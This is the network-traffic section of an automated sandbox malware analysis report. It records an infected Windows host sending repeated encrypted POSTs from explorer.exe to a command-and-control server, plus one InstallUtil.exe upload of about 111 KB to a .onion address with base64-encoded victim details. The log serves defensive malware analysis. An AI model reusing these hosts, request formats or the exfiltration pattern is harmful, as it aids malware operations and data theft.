                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.449800109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:40.934808969 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ylfmtobnffbq.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 343
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:40.934874058 CET343OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 43 3b c7 e7
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuC;|PAwJQ;{l\H~>fbRHXO`IWQ*ZCMbFAG><Q(4)gI@l4C1Q.1y
                                                                                                                                                                    Jan 7, 2024 05:30:41.333503962 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:41 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.449801109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:41.603909016 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://jpxwajpdnkogimiw.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 366
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:41.603956938 CET366OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3a 5a fa a2
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu:Zo9wGc[[.a:{U+#V\:e1"N[qy|<-#GEcX2*n{y_H7uOB-%bfgh(,Qq
                                                                                                                                                                    Jan 7, 2024 05:30:42.000166893 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:41 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.449802109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:42.333280087 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ctvxrapgisc.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 281
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:42.333316088 CET281OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3a 2f fa b5
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu:/cRRnaFMV0~5I[4EDN-F=aaIdlKk)D3F<X!?AJx[lWna~
                                                                                                                                                                    Jan 7, 2024 05:30:42.723196983 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:42 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.449803109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:42.986514091 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ictpimjqevsiiw.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 367
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:42.986514091 CET367OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 75 2d fd 90
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuu-ueFv>Wn$#v-!CV*#7hHLAjN+j)b?*!@CjD_oxj^^"j8VW\z
                                                                                                                                                                    Jan 7, 2024 05:30:43.403824091 CET238INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:43 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.449804109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:43.665229082 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://wjbrgmaqxdg.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 205
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:43.665256023 CET205OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 45 52 f1 b7
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuERMxE|]P$3-V]0gR1jFUBIM&)@PDN9q7WAO.$tz7S
                                                                                                                                                                    Jan 7, 2024 05:30:44.063977003 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:43 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    17192.168.2.449805109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:44.307847977 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://oeuarjhscgtxb.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 185
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:44.307847977 CET185OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 7d 45 ab e9
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu}EkI95kWK+wE)ph`Q5p-4Y9O|9kOj9O#
                                                                                                                                                                    Jan 7, 2024 05:30:44.665195942 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:44 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    18192.168.2.449797195.66.87.10589905544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:44.716809034 CET304OUTPOST /stld/ef0e6c9136fd4b779a75726a388c8439?u=am9uZXM%3D&p=ODMwMDIx&i=MTkxLjk2LjIyNy4xNzY%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=TmV3IFlvcms%3D&t=RGVmYXVsdA%3D%3D HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 111600Expect: 100-continueConnection: Keep-Alive
                                                                                                                                                                    Data Raw:
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Jan 7, 2024 05:30:45.310753107 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                    Jan 7, 2024 05:30:45.395977974 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    19192.168.2.449807109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:44.918147087 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://kmjcixwafidrft.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 265
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:44.918186903 CET265OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 24 45 e8 a0
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vu$EdajxwOYdyDnNgyHaOHOqQPG61HxTBBLF:);)rV2m4nvfPa
                                                                                                                                                                    Jan 7, 2024 05:30:45.320951939 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:45 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    20192.168.2.449808109.175.29.39802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:45.558131933 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://gnptdrklcangjx.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                    Host: gxutc2c.com
                                                                                                                                                                    Jan 7, 2024 05:30:45.558131933 CET359OUTData Raw: 3b 6e 55 63 84 cb 1b 25 df ab c5 73 04 73 78 bf 0b 02 cc 94 69 04 e5 62 0a 7e 7d 91 35 c1 c1 63 ed 5b c0 20 06 18 55 6c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 78 57 df a7
                                                                                                                                                                    Data Ascii: ;nUc%ssxib~}5c[ Ul? 9Yt M@NA -[k,vuxWsedr<~=wChKFl%_4'JuXII2IL.u9`Ji=9Cs/lnem#,EH
